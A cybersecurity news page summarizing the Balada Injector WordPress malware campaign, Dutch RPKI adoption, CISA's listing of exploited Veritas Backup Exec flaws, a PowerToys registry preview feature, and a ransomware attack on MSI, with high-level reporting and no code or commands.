Hackerzhome

hackerzhome-logo-bg

Cybersecurity news all over the world

HACKERZHOME NEWS

April 10, 2023

Monday

Balada Injector Malware Operation Has Affected More Than 1 Million WordPress Sites

Since 2017, it’s been reported that over a million WordPress websites have been compromised by a campaign to spread malware known as Balada Injector.


According to GoDaddy’s Sucuri, the extensive effort makes use of all known and recently found theme and plugin vulnerabilities to compromise WordPress websites. Every few weeks, the attacks are known to occur in waves.


Security researcher Dmitry Sinegubko noted that this campaign may be easily recognized by its preference for the String.fromCharCode obfuscation, the use of recently registered domain names hosting malicious scripts on random subdomains, and redirects to numerous fraud websites.


The websites include those that claim to offer false tech support, fake lottery winnings, and malicious CAPTCHA pages that beg users to enable notifications so that the actors may send spam emails.


The study expands on recent discoveries from Doctor Web, which described a family of Linux malware that compromises unprotected WordPress sites by making use of holes in more than two dozen plugins and themes.


In the intervening years, the Balada Injector has used more than 100 sites and a wide range of techniques to exploit well-known security holes (such as HTML injection and Site URL).


The attackers mostly seek to steal database credentials from the wp-config.php file.

NEWS 1
Balada Injector Malware Operation Has Affected More Than 1 Million WordPress Sites

Breaking news

LIVE

You are not up to date!

Subscribe to our newsletter and stay updated on cybersecurity news

The use of RPKI by all Dutch government networks will stop BGP hijacking.

By implementing the Resource Public Key Infrastructure (RPKI) standard by the end of 2024, the Netherlands government will increase the security of its internet routing.

Via the cryptographic verification of the routes, RPKI, or Resource Certification, guards against the incorrect rerouting of internet traffic, whether done deliberately or not.

The Border Gateway Protocol (BGP), which is used to exchange routing information, is secured by the standard using digital certificates. This ensures that traffic passes through the authorized network operator in charge of the IP addresses on the target path.

By implementing the Resource Public Key Infrastructure (RPKI) standard by the end of 2024, the Netherlands government will increase the security of its internet routing.

Via the cryptographic verification of the routes, RPKI, or Resource Certification, guards against the incorrect rerouting of internet traffic, whether done deliberately or not.

The Border Gateway Protocol (BGP), which is used to exchange routing information, is secured by the standard using digital certificates.

This ensures that traffic passes through the authorized network operator in charge of the IP addresses on the target path.

NEWS 2

For placing advertisements and promotions in this newspaper, or anywhere on our website, contact us through email at [email protected] or fill out this contact form.

Share this news:

April 10, 2023 /

Monday

Hackerzhome News

2

Have you heard?
Flipper Zero Was Prohibited By Amazon Because It Was A “Card Skimmer Device Know more!

Five actively exploited security flaws are reported by CISA; immediate action is required.

Five actively exploited security flaws are reported by CISA; immediate action is required.

In light of the evidence of ongoing exploitation in the wild, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added five security weaknesses to its list of “Known Exploited Vulnerabilities” (KEV) on Friday.

This involves three critical issues (CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878) in the Veritas Backup Exec Agent software that could allow privileged instructions to be executed on vulnerable systems.

According to a report released last week by Google-owned Mandiant, a partner of the BlackCat (also known as ALPHV and Noberus), the ransomware organization is targeting Veritas Backup Exec installations open to the public in order to acquire early access via the aforementioned three weaknesses.

The threat intelligence company, which is keeping tabs on the affiliate actor under the unclassified alias UNC4466, reported that it first noticed the vulnerability being exploited in the wild on October 22, 2022.

In one incident described by Mandiant, UNC4466 gained access to a Windows server that was exposed to the internet before performing a series of operations that allowed the attacker to deploy the Rust-based ransomware payload.

However, before doing so, the attacker first conducted reconnaissance, increased their level of privileges, and disabled Microsoft Defender’s real-time monitoring feature.

NEWS 3

Windows Registry preview is now available in Microsoft PowerToys.

Windows Registry preview is now available in Microsoft PowerToys.
NEWS 4

Users may now inspect registry file contents before importing them using a new feature added to Microsoft PowerToys, a collection of free applications for Windows 10 users.

Registry files offer instructions for changing the Windows registry, a database that holds settings for the operating system and applications.

The behavior of Windows can be altered in a number of ways, including appearance, performance, security, and compatibility.

Registry Preview, a new tool in PowerToys, attempts to simplify and secure this procedure.

Instead of accessing or directly importing registry files, it enables users to inspect their data through a graphical user interface (GUI).

In order to determine what changes will be made if the registry file is imported, users can also compare its contents with the registry’s present values.

It is currently in preview mode and usable with PowerToys version v69 or later. Users can enable it by heading to PowerToys > Plugins > Registry Preview and turning on the toggle switch.

Microsoft claims that because the functionality is still being developed, it may have some flaws or restrictions. Users are encouraged to leave comments and suggestions on the company’s GitHub website.

MSI, a Taiwanese Computer manufacturer, is attacked with ransomware

Taiwanese PC manufacturer MSI (short for Micro-Star International) officially stated that one of its systems had been the target of a cyberattack.

The company said that it “promptly” began incident response and recovery measures after learning of “network issues.” Additionally, it asserted that it had alerted law enforcement to the circumstance.

However, MSI did not provide any information regarding the attack’s timing or whether any confidential data, including source code, were exfiltrated.

As of right now, the damaged systems have progressively restored regular operations with little to no effect on financial activities, according to a brief note released by the company on Friday.

In a regulatory filing with the Taiwan Stock Exchange, it declared that it is implementing tighter controls of its network and infrastructure to ensure the protection of data.

Also, MSI advises customers to avoid downloading files from unofficial websites and to only get firmware and BIOS upgrades from the company’s official website.

MSI, a Taiwanese Computer manufacturer, is attacked with ransomware
NEWS 5

For placing advertisements and promotions in this newspaper, or anywhere on our website, contact us through email at [email protected] or fill out this contact form.

Share this news: